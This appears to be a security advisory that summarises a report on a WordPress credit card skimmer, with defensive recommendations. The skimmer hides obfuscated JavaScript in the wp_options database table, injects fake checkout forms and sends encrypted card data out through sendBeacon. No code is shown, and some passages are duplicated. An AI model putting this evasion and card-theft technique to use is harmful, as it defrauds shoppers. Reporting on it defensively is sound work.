WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables
Summary:
A recent investigation has revealed a highly sophisticated credit card skimmer malware targeting WordPress websites. This malware is designed to inject malicious JavaScript into database entries rather than traditional files like themes or plugins, allowing it to avoid detection by common file-scanning tools. Specifically, the malicious code is embedded in the WordPress database under the wp_options table, within the widget_block field, which contains obfuscated JavaScript. By operating within the database, the malware remains persistent and hidden from conventional security measures. It targets checkout pages, either by hijacking existing payment fields or injecting a fake credit card form that mimics legitimate payment processors tricking users into entering sensitive payment details.
The malware is programmed to activate when the page URL contains “checkout” while excluding “cart” to ensure it only captures payment information at the most critical stage. It dynamically creates a fake payment form, collecting credit card numbers, CVV codes, expiration dates, billing addresses, and other personal details. If a legitimate payment form is already present, the malware captures the information entered into these fields in real time. To make the stolen data appear innocuous, it uses Base64 encoding and AES-CBC encryption before transmitting it to attacker-controlled servers via the navigator.sendBeacon function, ensuring the data is exfiltrated silently without interrupting the user experience. Domains associated with the malware have been blocklisted.
Security Officer Comments:
This skimmer is particularly dangerous because it operates covertly, stealing payment information without altering the checkout process or alerting users. Attackers can use the stolen data for fraudulent transactions or sell it on underground markets, posing a severe financial risk to victims.
Suggested Corrections:
https://blog.sucuri.net/2025/01/ste...ss-checkout-pages-via-database-injection.html
A recent investigation has revealed a highly sophisticated credit card skimmer malware targeting WordPress websites. This malware is designed to inject malicious JavaScript into database entries rather than traditional files like themes or plugins, allowing it to avoid detection by common file-scanning tools. Specifically, the malicious code is embedded in the WordPress database under the wp_options table, within the widget_block field, which contains obfuscated JavaScript. By operating within the database, the malware remains persistent and hidden from conventional security measures. It targets checkout pages, either by hijacking existing payment fields or injecting a fake credit card form that mimics legitimate payment processors tricking users into entering sensitive payment details.
The malware is programmed to activate when the page URL contains “checkout” while excluding “cart” to ensure it only captures payment information at the most critical stage. It dynamically creates a fake payment form, collecting credit card numbers, CVV codes, expiration dates, billing addresses, and other personal details. If a legitimate payment form is already present, the malware captures the information entered into these fields in real time. To make the stolen data appear innocuous, it uses Base64 encoding and AES-CBC encryption before transmitting it to attacker-controlled servers via the navigator.sendBeacon function, ensuring the data is exfiltrated silently without interrupting the user experience. Domains associated with the malware have been blocklisted.
Security Officer Comments:
This skimmer is particularly dangerous because it operates covertly, stealing payment information without altering the checkout process or alerting users. Attackers can use the stolen data for fraudulent transactions or sell it on underground markets, posing a severe financial risk to victims.
Suggested Corrections:
- Regular Updates: Outdated software is a primary target for attackers who exploit vulnerabilities in old plugins and themes. Avoid this by consistently updating your site and applying the latest security patches. Alternatively, deploy a Web Application Firewall (WAF) for virtual patching.
- Admin Account Management: Weak admin passwords are a gateway for attackers. Utilize two-factor authentication and regularly review all admin accounts to ensure their validity. Update passwords frequently, making sure to use strong, unique passwords to bolster security.
- File Integrity Monitoring: Implement file integrity monitoring to detect any unauthorized changes to your website files. This serves as an early warning system for rapid response to potential threats.
- Web Application Firewall: A website firewall can effectively block malicious traffic and prevent hacking attempts from reaching your server.
https://blog.sucuri.net/2025/01/ste...ss-checkout-pages-via-database-injection.html